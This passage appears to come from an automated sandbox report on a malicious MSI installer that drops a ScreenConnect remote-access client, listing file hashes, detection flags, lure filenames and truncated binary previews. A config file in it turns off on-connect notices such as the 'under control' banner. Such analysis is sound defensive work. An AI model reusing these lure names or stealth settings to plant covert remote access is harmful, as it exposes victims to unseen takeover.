                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.58476728626163
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.068776675019683
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                  • Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):95520
                                                                                  Entropy (8bit):6.505346220942731
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):260168
                                                                                  Entropy (8bit):6.416438906122177
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                  MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                  SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                  SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                  SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):61216
                                                                                  Entropy (8bit):6.31175789874945
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):601376
                                                                                  Entropy (8bit):6.185921191564225
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):842248
                                                                                  Entropy (8bit):6.268561504485627
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                  MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                  SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                  SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                  SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81696
                                                                                  Entropy (8bit):5.862223562830496
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):3343
                                                                                  Entropy (8bit):4.771733209240506
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                  MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                  SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                  SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                  SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):939
                                                                                  Entropy (8bit):5.796466792414452
